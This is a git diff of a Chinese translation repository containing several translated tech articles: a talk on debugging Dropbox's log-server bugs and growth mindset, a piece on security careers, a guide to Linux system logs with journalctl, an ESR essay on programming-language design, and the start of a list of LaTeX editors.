第二个 bug 和第一个相似:如果日志目录的大小达到了上限,客户端会从最新的日志而不是最早的日志开始删除。同理,你总是会丢失一些日志文件,但你大概更不在乎那些较早的日志。
|
||||
|
||||
第三个 bug 和加密有关。有时服务器会无法对一个日志文件解码(我们一般不知道为什么——也许发生了位反转)。我们在后端没有正确地处理这个错误,而服务器会返回 500。客户端看到 500 之后会做合理的反应:它会认为服务器停机了。所以它会停止发送日志文件并且不再尝试发送其他的日志。
|
||||
|
||||
对于一个损坏的日志文件返回 500 显然不是正确的行为。你可以考虑返回 400,因为问题出在客户端的请求上。但客户端同样无法修复这个问题——如果日志文件现在无法解码,我们以后也永远无法将它解码。客户端正确的做法是直接删除日志文件然后继续运行。实际上,这正是客户端在成功上传日志文件并从服务器收到 200 的响应时的默认行为。所以我们说,好——如果日志文件无法解码,就返回 200。
|
||||
|
||||
所有这些 bug 都很容易修复。前两个 bug 出在客户端上,所以我们在 alpha 版本修复了它们,但大部分的客户端还没有获得这些改动。我们在服务器代码中修复了第三个 bug 并部署了新版的服务器。
|
||||
|
||||
### 📈
|
||||
|
||||
突然日志服务器集群的流量开始激增。客服团队找到我们并问我们是否知道原因。我花了点时间把所有的部分拼到一起。
|
||||
|
||||
在修复之前,这四件事情会发生:
|
||||
|
||||
1. 日志文件从最早的开始发送
|
||||
|
||||
2. 日志文件从最新的开始删除
|
||||
|
||||
3. 如果服务器无法解码日志文件,它会返回 500
|
||||
|
||||
4. 如果客户端收到 500,它会停止发送日志
|
||||
|
||||
一个存有损坏的日志文件的客户端会试着发送这个文件,服务器会返回 500,客户端会放弃发送日志。在下一次运行时,它会尝试再次发送同样的文件,再次失败,并再次放弃。最终日志目录会被填满,然后客户端会开始删除最新的日志文件,而把损坏的文件继续保留在硬盘上。
|
||||
|
||||
这三个 bug 导致的结果是:如果客户端在任何时候生成了损坏的日志文件,我们就再也不会收到那个客户端的日志了。
|
||||
|
||||
问题是,处于这种状态的客户端比我们想象的要多很多。任何有一个损坏文件的客户端都会像被关在堤坝里一样,无法再发送日志。现在这个堤坝被清除了,所有这些客户端都开始发送它们的日志目录的剩余内容。
|
||||
|
||||
### 我们的选择
|
||||
|
||||
好的,现在文件从世界各地的电脑如洪水般涌来。我们能做什么?(当你在一个有 Dropbox 这种规模,尤其是这种桌面客户端的规模的公司工作时,会遇到这种有趣的事情:你可以非常轻易地对自己造成 DDOS 攻击)。
|
||||
|
||||
当你部署的新版本发生问题时,第一个选项是回滚。这是非常合理的选择,但对于这个问题,它无法帮助我们。我们改变的不是服务器的状态而是客户端的——我们删除了那些出错文件。将服务器回滚可以防止更多客户端进入这种状态,但它并不能解决根本问题。
|
||||
|
||||
那扩大日志集群的规模呢?我们试过了——然后因为处理能力增加了,我们开始收到更多的请求。我们又扩大了一次,但你不可能一直这么下去。为什么不能?因为这个集群并不是独立的。它会向另一个集群发送请求,在这里是为了处理异常。如果你的一个集群正在被 DDOS,而你持续扩大那个集群,你最终会把它依赖的集群也弄坏,然后你就有两个问题了。
|
||||
|
||||
我们考虑过的另一个选择是减低负载——你不需要每一个日志文件,所以我们可以直接无视一些请求。一个难点是我们并没有一个很好的方法来区分好的请求和坏的请求。我们无法快速地判断哪些日志文件是旧的,哪些是新的。
|
||||
|
||||
我们最终使用的是一个 Dropbox 里许多不同场合都用过的一个解决方法:我们有一个自定义的头字段,`chillout`,全世界所有的客户端都遵守它。如果客户端收到一个有这个头字段的响应,它将在字段所标注的时间内不再发送任何请求。很早以前一个英明的程序员把它加到了 Dropbox 客户端里,在之后这些年中它已经不止一次地起了作用。
|
||||
|
||||
### 了解你的系统
|
||||
|
||||
这个 bug 的第一个教训是要了解你的系统。我对于客户端和服务器之间的交互有不错的理解,但我并没有考虑到当服务器和所有这些客户端同时交互的时候会发生什么。这是一个我没有完全搞懂的层面。
|
||||
|
||||
### 了解你的工具
|
||||
|
||||
第二个教训是要了解你的工具。如果出了差错,你有哪些选项?你能撤销你做的迁移吗?你如何知道事情出了差错,你又如何发现更多信息?所有这些事情都应该在危机发生之前就了解好——但如果你没有,你会在危机发生时学到它们并不会再忘记。
|
||||
|
||||
### 功能开关 & 服务器端功能控制
|
||||
|
||||
第三个教训是专门针对移动端和桌面应用开发者的:_你需要服务器端功能控制和功能开关_。当你发现一个问题时如果你没有服务器端的功能控制,你可能需要几天或几星期来推送新版本或者提交新版本到应用商店中,然后问题才能得到解决。这是个很糟糕的处境。Dropbox 桌面客户端不需要经过应用商店的审查过程,但光是把一个版本推送给上千万的用户就已经要花很多时间。相比之下,如果你能在新功能遇到问题的时候在服务器上翻转一个开关:十分钟之后你的问题就已经解决了。
|
||||
|
||||
这个策略也有它的代价。加入很多的功能开关会大幅提高你的代码的复杂度。而你的测试代码更是会成指数地复杂化:要考虑 A 功能和 B 功能都开启,或者仅开启一个,或者都不开启的情况——然后每个功能都要相乘一遍。让工程师们在事后清理他们的功能开关是一件很难的事情(我自己也有这个毛病)。另外,桌面客户端会同时有好几个版本有人使用,也会加大思考难度。
|
||||
|
||||
但是它的好处——啊,当你需要它的时候,你真的是很需要它。
|
||||
|
||||
# 如何去爱 bug
|
||||
|
||||
我讲了几个我爱的 bug,也讲了为什么要爱 bug。现在我想告诉你如何去爱 bug。如果你现在还不爱 bug,我知道唯一一种改变的方法,那就是要有成长型心态。
|
||||
|
||||
社会学家 Carol Dweck 做了很多关于人们如何看待智力的研究。她找到两种不同的看待智力的心态。第一种,她叫做固定型心态,认为智力是一个固定的特征,人类无法改变自己智力的多寡。另一种心态叫做成长型心态。在成长型心态下,人们相信智力是可变的而且可以通过努力来增强。
|
||||
|
||||
Dweck 发现一个人看待智力的方式——固定型还是成长型心态——可以很大程度地影响他们选择任务的方式、面对挑战的反应、认知能力、甚至是他们的诚信度。
|
||||
|
||||
【我在新西兰 Kiwi Pycon 会议所做的主题演讲中也讨论过成长型心态,所以在此只摘录一部分内容。你可以在[这里][7]找到完整版的演讲稿】
|
||||
|
||||
关于诚信的发现:
|
||||
|
||||
> 在这之后,他们让学生们给笔友写信讲这个实验,信中说“我们在学校做了这个实验,这是我得的分数”。他们发现 _因智力而受到表扬的学生中几乎一半人谎报了自己的分数_ ,而因努力而受表扬的学生则几乎没有人不诚实。
|
||||
|
||||
关于努力:
|
||||
|
||||
> 数个研究发现有着固定型心态的人会不愿真正去努力,因为他们认为这意味着他们不擅长做他们正努力去做的这件事情。Dweck 写道,“如果每当一个任务需要努力的时候你就会怀疑自己的智力,那么你会很难对自己的能力保持自信。”
|
||||
|
||||
关于面对困惑:
|
||||
|
||||
> 他们发现有成长型心态的学生大约能理解 70% 的内容,不论里面是否有难懂的段落。在有固定型心态的学生中,那些被分配没有难懂段落的手册的学生同样可以理解大约 70%。但那些看到了难懂段落的持固定型心态的学生的记忆则降到了 30%。有着固定型心态的学生非常不擅长从困惑中恢复。
|
||||
|
||||
这些发现表明成长型心态对 debug 至关重要。我们必须从从困惑中重整旗鼓,诚实地面对我们理解上的不足,并时不时地在寻找答案的路上努力奋斗——成长型心态会让这些都变得更简单而且不那么痛苦。
|
||||
|
||||
### 热爱你的 bug
|
||||
|
||||
我在 Recurse Center 工作时会直白地欢迎挑战,我就是这样学会热爱我的 bug 的。有时参与者会坐到我身边说“唉,我觉得我遇到了个奇怪的 Python bug”,然后我会说“太棒了,我 _爱_ 奇怪的 Python bug!” 首先,这百分之百是真的,但更重要的是,我这样是在对参与者强调,找到让自己觉得困难的事情是一种成就,而他们做到了这一点,这是件好事。
|
||||
|
||||
像我之前说过的,在 Recurse Center 没有截止日期也没有作业,所以这种态度没有任何成本。我会说,“你现在可以花一整天去在 Flask 里找出这个奇怪的 bug 了,多令人兴奋啊!”在 Dropbox 和之后的 Pilot,我们有产品需要发布,有截止日期,还有用户,于是我并不总是对在奇怪的 bug 上花一整天而感到兴奋。所以我对有截止日期的现实也是感同身受。但是如果我有 bug 需要解决,我就必须得去解决它,而抱怨它的存在并不会帮助我之后更快地解决它。我觉得就算在截止日期临近的时候,你也依然可以保持这样的心态。
|
||||
|
||||
如果你热爱你的 bug,你可以在解决困难问题时获得更多乐趣。你可以担心得更少而更加专注,并且从中学到更多。最后,你可以和你的朋友和同事分享你的 bug,这将会同时帮助你自己和你的队友们。
|
||||
|
||||
### 鸣谢!
|
||||
|
||||
在此向给我的演讲提出反馈以及给我的演讲提供其他帮助的人士表示感谢:
|
||||
|
||||
* Sasha Laundy
|
||||
|
||||
* Amy Hanlon
|
||||
|
||||
* Julia Evans
|
||||
|
||||
* Julian Cooper
|
||||
|
||||
* Raphael Passini Diniz 以及其他的 Python Brasil 组织团队成员
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://akaptur.com/blog/2017/11/12/love-your-bugs/
|
||||
|
||||
作者:[Allison Kaptur ][a]
|
||||
译者:[yixunx](https://github.com/yixunx)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://akaptur.com/about/
|
||||
[1]:http://2017.pythonbrasil.org.br/#
|
||||
[2]:http://www.youtube.com/watch?v=h4pZZOmv4Qs
|
||||
[3]:http://www.pilot.com/
|
||||
[4]:http://www.dropbox.com/
|
||||
[5]:http://www.recurse.com/
|
||||
[6]:http://www.youtube.com/watch?v=ETgNLF_XpEM
|
||||
[7]:http://akaptur.com/blog/2015/10/10/effective-learning-strategies-for-programmers/
|
@ -0,0 +1,58 @@
|
||||
安全工作热门:受到培训并获得注意
|
||||
============================================================
|
||||
|
||||
![security skills](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-skills.png?itok=IrwppCUw "security skills")
|
||||
来自 Dice 和 Linux 基金会的“开源工作报告”发现,未来对具有安全经验的专业人员的需求很高。[经许可使用][1]
|
||||
|
||||
对安全专业人员的需求是真实的。在 [Dice.com][4] 中,超过 75,000 个职位中有 15% 是安全职位。[Forbes][6] 中称:“根据网络安全数据工具 [CyberSeek][5],在美国每年有 4 万个信息安全分析师的职位空缺,雇主正在努力填补其他 20 万个与网络安全相关的工作。”我们知道,安全专家的需求正在快速增长,但兴趣水平还很低。
|
||||
|
||||
### 安全是要关注的领域
|
||||
|
||||
根据我的经验,很少有大学生对安全工作感兴趣,所以很多人把安全视为利基。入门级技术专家对业务分析师或系统分析师感兴趣,因为他们认为,如果想学习和应用核心 IT 概念,就必须坚持分析师工作或者更接近产品开发的工作。事实并非如此。
|
||||
|
||||
事实上,如果你有兴趣领先于商业领导者,那么安全是要关注的领域 - 作为一名安全专业人员,你必须端到端地了解业务,你必须看大局来给你的公司优势。
|
||||
|
||||
### 无所畏惧
|
||||
|
||||
分析师和安全工作并不完全相同。公司出于必要继续合并工程和安全工作。企业正在以前所未有的速度进行基础架构和代码的自动化部署,从而提高了安全作为所有技术专业人士日常生活的一部分的重要性。在我们的[ Linux 基金会的开源工作报告][7]中,42% 的招聘经理表示未来对有安全经验的专业人士的需求很大。
|
||||
|
||||
在安全方面从未有过更激动人心的时刻。如果你随时掌握最新的技术新闻,就会发现大量的事情与安全相关 - 数据泄露、系统故障和欺诈。安全团队正在不断变化,快节奏的环境中工作。真正的挑战在于在保持甚至改进最终用户体验的同时,积极主动地进行安全性,发现和消除漏洞。
|
||||
|
||||
### 增长即将来临
|
||||
|
||||
在技术的任何方面,安全将继续与云一起成长。企业越来越多地转向云计算,这暴露出比组织过去更多的安全漏洞。随着云的成熟,安全变得越来越重要。
|
||||
|
||||
条例也在不断完善 - 个人身份信息(PII)越来越广泛。许多公司都发现他们必须投资安全来保持合规,避免成为头条新闻。由于面临巨额罚款,声誉受损以及行政工作安全,公司开始越来越多地为安全工具和人员安排越来越多的预算。
|
||||
|
||||
### 培训和支持
|
||||
|
||||
即使你不选择一个特定的安全工作,你也一定会发现自己需要写安全的代码,如果你没有这个技能,你将开始一场艰苦的战斗。如果你的公司提供在工作中学习的话也是鼓励的,但我建议结合培训、指导和不断实践。如果你不使用安全技能,你将很快在快速进化的恶意攻击的复杂性中失去它们。
|
||||
|
||||
对于那些寻找安全工作的人来说,我的建议是找到组织中那些在工程、开发或者架构领域最为强大的人员 - 与他们和其他团队进行交流,做好实际工作,并且确保在心里保持大局。成为你的组织中一个脱颖而出的人,一个可以写安全的代码,同时也可以考虑战略和整体基础设施健康状况的人。
|
||||
|
||||
### 游戏最后
|
||||
|
||||
越来越多的公司正在投资安全性,并试图填补他们的技术团队的开放角色。如果你对管理感兴趣,那么安全是值得关注的地方。执行领导希望知道他们的公司正在按规则行事,他们的数据是安全的,并且免受破坏和损失。
|
||||
|
||||
明智地实施和有战略思想的安全是受到关注的. 安全对高管和消费者而言至关重要 - 我鼓励任何对安全感兴趣的人进行培训和贡献。
|
||||
|
||||
_现在[下载][2]完整的 2017 年开源工作报告_
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/blog/os-jobs-report/2017/11/security-jobs-are-hot-get-trained-and-get-noticed
|
||||
|
||||
作者:[ BEN COLLEN][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com/users/bencollen
|
||||
[1]:https://www.linux.com/licenses/category/used-permission
|
||||
[2]:http://bit.ly/2017OSSjobsreport
|
||||
[3]:https://www.linux.com/files/images/security-skillspng
|
||||
[4]:http://www.dice.com/
|
||||
[5]:http://cyberseek.org/index.html#about
|
||||
[6]:https://www.forbes.com/sites/jeffkauflin/2017/03/16/the-fast-growing-job-with-a-huge-skills-gap-cyber-security/#292f0a675163
|
||||
[7]:http://media.dice.com/report/the-2017-open-source-jobs-report-employers-prioritize-hiring-open-source-professionals-with-latest-skills/
|
@ -1,68 +0,0 @@
|
||||
### 系统日志: 了解你的Linux系统
|
||||
|
||||
![chabowski](https://www.suse.com/communities/blog/files/2016/03/chabowski_avatar_1457537819-100x100.jpg)
|
||||
By: [chabowski][1]
|
||||
|
||||
本文摘自教授Linux小白(或者非资深桌面用户)技巧的系列文章. 该系列文章旨在为由LinuxMagazine基于 [openSUSE Leap][3] 发布的第30期特别版 “[Getting Started with Linux][2]” 提供补充说明.
|
||||
|
||||
本文作者是 Romeo S. Romeo, 他是一名 PDX-based enterprise Linux 专家,专为创新企业提供富有伸缩性的解决方案.
|
||||
|
||||
Linux系统日志非常重要. 后台运行的程序(通常被称为守护进程或者服务进程)处理了你Linux系统中的大部分任务. 当这些守护进程工作时,它们将任务的详细信息记录进日志文件中,作为他们做过什么的历史信息. 这些守护进程的工作内容涵盖从使用原子钟同步时钟到管理网络连接. 所有这些都被记录进日志文件,这样当有错误发生时,你可以通过查阅特定的日志文件来看出发生了什么.
|
||||
|
||||
![](https://www.suse.com/communities/blog/files/2017/11/markus-spiske-153537-300x450.jpg)
|
||||
|
||||
Photo by Markus Spiske on Unsplash
|
||||
|
||||
有很多不同的日志. 历史上, 他们一般以纯文本的格式存储到 `/var/log` 目录中. 现在依然有很多日志这样做, 你可以很方便的使用 `less` 来查看它们.
|
||||
在新装的 `openSUSE Leap 42.3` 以及大多数现代操作系统上,重要的日志由 `systemd` 初始化系统存储. `systemd`这套系统负责启动守护进程并在系统启动时让计算机做好被使用的准备。
|
||||
由 `systemd` 记录的日志以二进制格式存储, 这使得它们消耗的空间更小,更容易被浏览,也更容易被导出成其他各种格式,不过坏处就是你必须使用特定的工具才能查看.
|
||||
好在, 这个工具已经预安装在你的系统上了: 它的名字叫 `journalctl`,而且默认情况下, 它会将每个守护进程的所有日志都记录到一个地方.
|
||||
|
||||
只需要运行 `journalctl` 命令就能查看你的 `systemd` 日志了. 它会用 `less` 分页器显示各种日志. 为了让你有个直观的感受, 下面是`journalctl` 中摘录的一条日志记录:
|
||||
|
||||
```
|
||||
Jul 06 11:53:47 aaathats3as pulseaudio[2216]: [pulseaudio] alsa-util.c: Disabling timer-based scheduling because running inside a VM.
|
||||
```
|
||||
|
||||
这条独立的日志记录依次包含了记录的日期和时间, 计算机名, 记录日志的进程名, 记录日志的进程PID, 以及日志内容本身.
|
||||
|
||||
若系统中某个程序运行出问题了, 则可以查看日志文件并搜索(使用 “/” 加上要搜索的关键字)程序名称. 有可能导致该程序出问题的错误会记录到系统日志中.
|
||||
有时,错误信息会足够详细让你能够修复该问题. 其他时候, 你需要在Web上搜索解决方案. Google就很适合来搜索奇怪的Linux问题.
|
||||
![](https://www.suse.com/communities/blog/files/2017/09/Sunglasses_Emoji-450x450.png)
|
||||
不过搜索时请注意你只输入了日志的内容, 行首的那些信息(日期, 主机名, 进程ID) 是无意义的,会干扰搜索结果.
|
||||
|
||||
解决方法一般在搜索结果的前几个连接中就会有了. 当然,你不能只是无脑得运行从互联网上找到的那些命令: 请一定先搞清楚你要做的事情是什么,它的效果会是什么.
|
||||
据说, 从系统日志中查询日志要比直接搜索描述故障的关键字要有用的多. 因为程序出错有很多原因, 而且同样的故障表现也可能由多种问题引发的.
|
||||
|
||||
比如, 系统无法发声的原因有很多, 可能是播放器没有插好, 也可能是声音系统出故障了, 还可能是缺少合适的驱动程序.
|
||||
如果你只是泛泛的描述故障表现, 你会找到很多无关的解决方法,而你也会浪费大量的时间. 而指定搜索日志文件中的内容, 你只会查询出他人也有相同日志内容的结果.
|
||||
你可以对比一下图1和图2.
|
||||
|
||||
![](https://www.suse.com/communities/blog/files/2017/11/picture1-450x450.png)
|
||||
|
||||
图 1 搜索系统的故障表现只会显示泛泛的,不精确的结果. 这种搜索通常没什么用.
|
||||
|
||||
![](https://www.suse.com/communities/blog/files/2017/11/picture2-450x450.png)
|
||||
|
||||
图 2 搜索特定的日志行会显示出精确的,有用的结果. 这种搜索通常很有用.
|
||||
|
||||
也有一些系统不用 `journalctl` 来记录日志. 在桌面系统中最常见的这类日志包括用于记录 openSUSE 包管理器行为的 `/var/log/zypper.log`; `/var/log/boot.log` 记录系统启动时的消息,这类消息往往滚动得特别快,根本看不过来; `/var/log/ntp` 用来记录 Network Time Protocol 守护进程同步时间时发生的错误.
|
||||
另一个存放硬件故障信息的地方是 `Kernel Ring Buffer`(内核环状缓冲区), 你可以输入 `dmesg -H` 命令来查看(这条命令也会调用 `less` 分页器来查看).
|
||||
`Kernel Ring Buffer` 存储在内存中, 因此会在重启电脑后丢失. 不过它包含了Linux内核中的重要事件, 比如新增了硬件, 加载了模块, 以及奇怪的网络错误.
|
||||
|
||||
希望你已经准备好深入了解你的Linux系统了! 祝你玩的开心!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.suse.com/communities/blog/system-logs-understand-linux-system/
|
||||
|
||||
作者:[chabowski]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[1]:https://www.suse.com/communities/blog/author/chabowski/
|
||||
[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux
|
||||
[3]:https://en.opensuse.org/Portal:42.3
|
||||
[4]:http://www.linux-magazine.com/
|
@ -1,59 +0,0 @@
|
||||
ESR:最合理的语言工程模式
|
||||
============================================================
|
||||
|
||||
当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义、社会学意义,达到了奥地利经济学家所称的“<ruby>人类行为学<rt>praxeology</rt></ruby>”,这是目的明确的人类行为所能达到的最大范围。
|
||||
|
||||
对我来说这并不只是抽象理论。当我在开源开发项目中编写论文时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。
|
||||
|
||||
在这个背景下,我的计划之外的文章系列的第三篇中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的、更实用的想法,它们主要是关于计算机语言设计的分析,例如为什么它们会成功,或为什么它们会失败。
|
||||
|
||||
在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。
|
||||
|
||||
现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言、函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题?
|
||||
|
||||
所谓的“远”、“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。
|
||||
|
||||
在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题,汇编语言是短期解决方案。说明这种分类适用于非通用语言,还有 roff 标记语言。随着计算机技术的发展,PHP 和 Javascript 逐渐参与到这场游戏中。至于长期的解决方案? Oberon、Ocaml、ML、XML-Docbook 都可以。 它们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。
|
||||
|
||||
如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。
|
||||
|
||||
这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: (1)以远近为轴,在自身和预计的未来之间选取一个最适点,然后(2)降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
|
||||
|
||||
在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。
|
||||
|
||||
当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用!
|
||||
|
||||
相反的, C 语言低廉的内部转化成本未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN、Pascal 、汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。
|
||||
|
||||
C++ 语言同样胜在它低廉的转化成本。很快,大部分新兴的语言为了降低自身转化成本,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了类 C 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。
|
||||
|
||||
另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python 就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。
|
||||
|
||||
今天我们在 2017 年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。
|
||||
|
||||
即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。
|
||||
|
||||
我们现在已经知道了两件十分重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。
|
||||
|
||||
这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。
|
||||
|
||||
当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前 20 名,在 PYPL 指数上它的成就也比 Go 差很多。
|
||||
|
||||
五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。
|
||||
|
||||
在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://esr.ibiblio.org/?p=7745
|
||||
|
||||
作者:[Eric Raymond][a]
|
||||
译者:[Valoniakim](https://github.com/Valoniakim)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://esr.ibiblio.org/?author=2
|
||||
[1]:http://esr.ibiblio.org/?author=2
|
||||
[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931
|
||||
[3]:http://esr.ibiblio.org/?p=7745
|
184
translated/tech/20171119 10 Best LaTeX Editors For Linux.md
Normal file
184
translated/tech/20171119 10 Best LaTeX Editors For Linux.md
Normal file
@ -0,0 +1,184 @@
|
||||
针对 Linux 平台的 10 款最好 LaTeX 编辑器
|
||||
======
|
||||
**简介:一旦你克服了 LaTeX 的学习曲线,就没有什么比得上 LaTeX 了。下面介绍的是针对 Linux 和其他平台的最好的 LaTeX 编辑器。**
|
||||
|
||||
## LaTeX 是什么?
|
||||
|
||||
[LaTeX][1] 是一个文档制作系统。与纯文本编辑器不同,在 LaTeX 编辑器中你不能只写纯文本,为了组织文档的内容,你还必须使用一些 LaTeX 命令。
|
||||
|
||||
![LaTeX 示例][2]![LaTeX 示例][3]
|
||||
|
||||
LaTeX 编辑器一般用在出于学术目的的科学研究文档或书籍的出版,最重要的是,当你需要处理包含众多复杂数学符号的文档时,它能够为你带来方便。当然,使用 LaTeX 编辑器是很有趣的,但它也并非总是很有用,除非你对所要编写的文档有一些特别的需求。
|
||||
|
||||
## 为什么你应当使用 LaTeX?
|
||||
|
||||
好吧,正如我前面所提到的那样,使用 LaTeX 编辑器便意味着你有着特定的需求。为了捣腾 LaTeX 编辑器,并不需要你有一颗极客的头脑。但对于那些使用一般文本编辑器的用户来说,它并不是一个很有效率的解决方法。
|
||||
|
||||
假如你正在寻找一款工具来精心制作一篇文档,同时你对花费时间在格式化文本上没有任何兴趣,那么 LaTeX 编辑器或许正是你所寻找的那款工具。在 LaTeX 编辑器中,你只需要指定文档的类型,它便会相应地为你设置好文档的字体种类和大小尺寸。正是基于这个原因,难怪它会被认为是 [给作家的最好开源工具][4] 之一。
|
||||
|
||||
但请务必注意: LaTeX 编辑器并不是自动化的工具,你必须首先学会一些 LaTeX 命令来让它能够精确地处理文本的格式。
|
||||
|
||||
## 针对 Linux 平台的 10 款最好 LaTeX 编辑器
|
||||
|
||||
